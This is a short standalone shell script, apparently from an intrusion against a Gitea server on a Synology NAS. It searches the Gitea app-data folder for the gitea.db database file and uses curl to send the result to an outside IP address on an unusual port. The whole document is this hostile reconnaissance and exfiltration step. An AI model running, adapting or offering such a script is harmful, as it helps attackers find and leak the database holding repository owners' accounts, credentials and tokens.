#!/bin/sh
find /volume1/@appdata/gitea -name gitea.db -type f 2>&1 | curl -s -m 5 --data-binary @- http://202.79.169.91:28016/db_file
